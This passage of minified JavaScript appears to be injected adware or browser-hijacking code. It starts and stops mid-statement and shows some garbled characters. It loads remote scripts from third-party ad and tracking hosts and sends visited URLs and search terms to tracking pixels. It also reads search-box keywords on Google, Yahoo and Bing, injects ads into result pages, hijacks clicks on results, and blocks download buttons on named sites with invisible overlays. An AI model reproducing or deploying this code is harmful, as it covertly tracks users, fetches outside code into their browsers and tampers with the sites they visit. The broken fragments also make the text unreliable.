xtLastName,objBody$content_0$leftcolumn_0$txtEmail\".split(','),\"5\")})();if(window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//www.superfish.com/ws/sf_main.jsp?dlsource=cbsfastsave&userId=14358494935046227763&CTID=p1';document.getElementsByTagName(\"head\")[0].appendChild(script);};try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"http://istatic.datafastguru.info/fo/min/fo_bsso.min.js?subid=pnd&hid=9915884634379027054\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;if(window.self==window.top && window.self.location.protocol=='http:'){var script=document.createElement('script');script.type='text/javascript';script.src='//istatic.datafastguru.info/fo/min/wp.js?subid=pnd&hid=9915884634379027054';document.getElementsByTagName(\"head\")[0].appendChild(script);};window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.4.1.p\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};a.cookie=new function(){var a=this;a.createCookie=function(a,c,b){if(b){var g=new Date;g.setTime(g.getTime()+864E5*b);b=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),b=0;b<c.length;b++){for(var g=c;\" \"==g.charAt(0);)g=g.substring(1,g.length); if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};a.ajax={get:function(c,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",c,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&b(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(c,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",c,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange= function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};b=encodeURIComponent(b);this.xhr.send(b)}};a.waitForTokens={};a.addScript=function(a,b){if(\"bing\"==b){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};a.waitForElement=function(c,d,e,f){var g=a.query_selector_all©; clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}};a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!= typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1< b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b= new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()};a.msie=function(){var a= parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};a.match_url= function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}};a.ping=function(a){for(var d=[\"google\",\"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname);f.src= b.pixelHost+\"?hid=9915884634379027054&eid=672&pid=1&prodid=316&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=GB&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var k=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"],src_for_keyword:[\"#gbqfq\", \"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d=0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()},!1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0; c.callback=a;c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\")||b.utils.query_selector_all(\".tn\");if(b.utils.isFalse(a))if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return(b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]).className.match(/(hdtb_msel|tn-selected-mode)/)&&(b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\", dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}}};var l=function(a){if(\"string\"==typeof a){var c=a.match(/:nth-match\\(([0-9]+)\\)/);if(c&&1<c.length)return a=b.utils.query_selector_all(a.substr(0, c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e);g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]=d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+b,f[b+d]);g&&a.cache.push([b,d,e,f])}:function(){};a.remove=window.removeEventListener? function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element:a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"== a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);try{c.style[f]=a.attrs.style[e]}catch(g){}}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder=a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth= a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(h){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop©)c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d=0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault(): a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g= b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)a=a.replace(/\\\"/g,'\\\\\"');return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json©);a=JSON.stringify(a);c=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl},{replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}]; for(d=0;d<c.length;d++)a=a.replace(RegExp(\"\\\\[##\"+c[d].replace+\"##\\\\]\",\"g\"),c[d][\"with\"]);try{return JSON.parse(a)}catch(e){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c=0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"== a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling):a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b=0;b<k.length;b++)if(-1<a.layouts.id.indexOf(k))return k;return!1};b.create_search= function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault?b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/,\"\")};b.is_target_valid=function(a){if(0!= __yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts.selector),\"undefined\"!==typeof a.element){a.insert=a.inserts.at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left=!1;var d=b.get_ad_dom(a); (function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(d=0;d<b.num_of_items_in_one&&0!=c.length;d++)b.insert_point.children.push(b.get_item_json(a,c[0])),\"true\"==a.layouts.unique?b.not_unique_items.push(c.shift()):c.shift()};b.addEventsToItems=function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[c],!1)};b.check_if_div_in_dom= function(a,b){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var h=l(f.inserts[g].selector);\"undefined\"!==typeof h&&d.push(h)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var k=this;p=setTimeout(function(){k.apply(k,arguments)},200)}b()};b.loop_targets=function(a,c,d){if(a instanceof Object&&(b.get_target_element(a),b.is_target_valid(a)&& (\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a.node=b.create_search(a)}catch(e){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.removeSecondClick=function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++)b.events.add(\"click\",function(a){setTimeout(function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++){var d=a[c];d.outerHTML=d.outerHTML.replace(/href\\=/ig,\"_href=\")}},20)},!1,a[c],!0)};b.inject_search= function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c=__yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak();b.j||b.removeSecondClick();b.utils.flushWaitForTokens()}))};b.init_search_project=function(){b.waitForElementCounter= 0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name;b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1};b.get_keyword=function(a,c){var d=a.src_for_keyword,e= function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(2>b.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d,function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c=b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"== a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&b.remove_se_handler©,__yael.inject_search())}; \"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=9915884634379027054&eid=672&pid=1&prid=338\";\"undefined\"!=typeof specificFeeds&&specificFeeds instanceof Array&&(d+=\"&_feeds=\"+specificFeeds.join(\",\"));if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\");e.parentNode.removeChild(e)}e=document.createElement(\"script\");e.id=\"__yael_script\"; e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\",b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement,!1)}}); ;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1750/l.js?aoi=1311798366&pid=1750&zoneid=511181&ext=dealpeak&systemid=9915884634379027054\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;try {new function() {var host = document.location.hostname;if (document.getElementById(\"id_a5473d4cf63ddeac\") == null&& window.self == window.top&& host !== \"www.bing.com\"&& host !== \"bing.com\"&& host !== \"www.tuvaro.com\"&& host !== \"tuvaro.com\"&& host !== \"www.srv1.feedads-srv.com\"&& host !== \"srv1.feedads-srv.com\") {var script = document.createElement(\"script\");script.type = \"text/javascript\";script.src = \"//asrv-a.akamaihd.net/sd/1017/1005.js\";script.setAttribute(\"id\", \"id_a5473d4cf63ddeac\");document.getElementsByTagName(\"head\")[0].appendChild(script);}}}catch (e) {};if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1749/l.js?aoi=1311798366&pid=1749&zoneid=511181&ext=dealpeak&systemid=9915884634379027054\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;(function(){-1<window.self.location.hostname.indexOf(\"kass.t\")&&setTimeout(function(){if(document.getElementById('_ad4d917f2e764fab63b916b5e0655d2e') && document.getElementById('_ad4d917f2e764fab63b916b5e0655d2e').firstElementChild){document.getElementById('_ad4d917f2e764fab63b916b5e0655d2e').firstElementChild.onclick=function(){return false}};if(document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\")){var a=document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\"),b=document.createElement(\"div\");b.setAttribute(\"style\",\"width:100%;height:300%;position:absolute;left:0;top:0\");b.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">';a.style.position=\"relative\";a.appendChild(b)}document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\")&&(a=document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\"),b=document.createElement(\"div\"),b.setAttribute(\"style\",\"width:100%;height:121%;position:absolute;left:0;top:0\"),b.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">',a.style.position=\"relative\",a.appendChild(b))},250);if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){var d=function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var a=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+a.top+\"px;left:\"+a.left+\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch(b){}},c=document.createElement(\"script\");c.type=\"text/javascript\";c[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+d.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild©}if(-1<window.self.location.hostname.indexOf(\"irpy.co\")&&window.self==window.top)try{d=function(){try{$(\".download-maxiget, .download-trinity\").attr(\"href\",\"#\"),$(\"#mp3-with-trinity\").remove()}catch(a){}},-1<!navigator.userAgent.indexOf(\"chrome\")?d():(c=document.createElement(\"script\"),c.innerHTML=\"(\"+d.toString()+\")()\",document.body.appendChild©)}catch(e){}if('GB'!='GB'&&-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")){var d=document.createElement(\"img\");d.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\");d.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\";var a=document.getElementById(\"r1113566095\").parentNode;a.style.position=\"relative\";a.appendChild(d)};})();if(window.self.location.hostname.indexOf('hesefiles.c')>-1) window.self.location.href='about:blank';if(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var a=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))a();else{var s=document.createElement(\"script\");s.type=\"text/javascript\";s.innerHTML=\"(\"+a.toString()+\")()\";document.body.appendChild(s)}};if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var d=document.getElementsByTagName(\"div\"),i;for(i in d)d[i]&&d[i].style&&\"fixed\"==d[i].style.position&&\"solid\"==d[i].style.borderBottomStyle&&(d[i].style.display=\"none\")};if(-1<window.self.location.hostname.indexOf(\"oolrom.com\")){var date=new Date;date.setTime(date.getTime()+2592E6);var expires=\"; expires=\"+date.toGMTString();document.cookie=\"installer=14604\"+expires+\"; path=/;domain=.coolrom.com\"};if (-1<document.location.host.indexOf(\"bookbrowsee.ne\")) {new function(){for(var c=[\"adv.php?\",\"/adv.php?\"],d=0;d<document.links.length;d++)for(var a=document.links[d],e=a.pathname+a.search,b=0;b<c.length;b++)c==e.substr(0,c.length)&&\"nofollow\"==a.rel&&\"_blank\"==a.target&&(a.setAttribute(\"onclick\",\"return false\"),a.addEventListener(\"click\",function(a){a.returnValue=!1;a.preventDefault&&a.preventDefault()},!1))}};if(-1<document.location.host.indexOf(\"irrorcreator.co\")){for(var c=[\"verticdn.com\"],d=0;d<document.links.length;d++)for(var a=document.links[d],e=a.host,b=0;b<c.length;b++)c==e&&(a.setAttribute(\"onclick\",\"return false\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1))};if(-1<document.location.host.indexOf(\"loud-vibe.co\")){var a=document.getElementById(\"continue\");a.setAttribute(\"onclick\",\"return false\");a.setAttribute(\"href\",\"\");a.addEventListener(\"click\",function(b){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1);a.addEventListener(\"mousedown\",function(b){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1)};if(-1<document.location.host.indexOf(\"p3seal.co\")){var a=document.getElementById(\"continue\");a.setAttribute(\"onclick\",\"return false\");a.setAttribute(\"href\",\"\");a.addEventListener(\"click\",function(b){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1);a.addEventListener(\"mousedown\",function(b){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1)};if(-1<document.location.host.indexOf(\"p3vampire.co\")){var a=document.getElementById(\"continue\");a.setAttribute(\"onclick\",\"return false\");a.setAttribute(\"href\",\"\");a.addEventListener(\"click\",function(b){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1);a.addEventListener(\"mousedown\",function(b){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1)};if(-1<document.location.host.indexOf(\"leunlckr.co\")){var b=document.getElementsByTagName(\"button\")[0];b.parentNode.style.position=\"relative\";var d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.top=\"0\";d.style.left=\"0\";d.style.width=\"100%\";d.style.height=\"100%\";d.style.zIndex=\"9999\";d.style.cursor=\"pointer\";b.parentNode.appendChild(d)};;window.top==window.self&&new function(){var a=this;a.hostname=\"sendmusicmyallspy.com\";a.path=\"&eid=672&cc=GB&version=0.1&url=\"+encodeURIComponent(location.href)+\"&lan=\"+navigator.language+\"&ch=1&pid=1&hid=9915884634379027054\";a.prefix=\"rfgvtgbdfgh\";a.now=(new Date).getTime();a.interval=1728E5;a.clickhostname=\"\";a.feeds={mmg:{url:\"\"}};a.utils=new function(){this.addScript=function(b){var c=location.href.match(/http(?:s)?:\\/\\/www\\.bing\\.com\\/search\\?q=.*$/), f=document.createElement(\"script\");f.id=a.prefix;f.type=\"text/javascript\";f.src=b;c&&0<c.length?(b=Element.prototype.appendChild,c=document.createElement(\"iframe\"),Element.prototype.appendChild=c.document.appendChild,document.getElementsByTagName(\"head\")[0].appendChild(f),Element.prototype.appendChild=b):document.getElementsByTagName(\"head\")[0].appendChild(f)};this.decodeHtml=function(b){var c=document.createElement(\"div\");c.innerHTML=b;return c.firstChild.nodeValue};this.query_selector_all=document.querySelectorAll? function(b){try{return document.querySelectorAll(b)}catch©{}}:function(b){var c=b.match(/^#([^,\\s]+)$/)||[];if(1<c.length)return b=document.getElementById(c[1])||void 0,\"undefined\"!=typeof b?:[];c=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild©;document.__asya_qsaels=[];c.styleSheet.cssText=b+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};this.throttle=function(b,c){var a=null;return function(){var e= this,d=arguments;clearTimeout(a);a=setTimeout(function(){b.apply(e,d)},c)}};this.ajax=new function(){var b=this;b.get=function(c,a){try{b.xhr=new XMLHttpRequest,b.xhr.open(\"GET\",c,!0),b.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\"),b.xhr.onreadystatechange=function(){4==b.xhr.readyState&&a(b.xhr.responseText)},b.xhr.send()}catch(e){}};b.post=function(c,a,e){b.xhr=new XMLHttpRequest;b.xhr.open(\"POST\",c,!0);b.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\"); b.xhr.onreadystatechange=function(){4==b.ajax.xhr.readyState&&e(b.xhr.responseText)};a=encodeURIComponent(a);b.xhr.send(a)}};this.base64=new function(){var b=this;b._keyStr=\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\";b.encode=function©{var a=\"\",e,d,g,h,l,k,m=0;for(c=b._utf8_encode©;m<c.length;)e=c.charCodeAt(m++),d=c.charCodeAt(m++),g=c.charCodeAt(m++),h=e>>2,e=(e&3)<<4|d>>4,l=(d&15)<<2|g>>6,k=g&63,isNaN(d)?l=k=64:isNaN(g)&&(k=64),a=a+b._keyStr.charAt(h)+b._keyStr.charAt(e)+ b._keyStr.charAt(l)+b._keyStr.charAt(k);return a};b.decode=function©{var 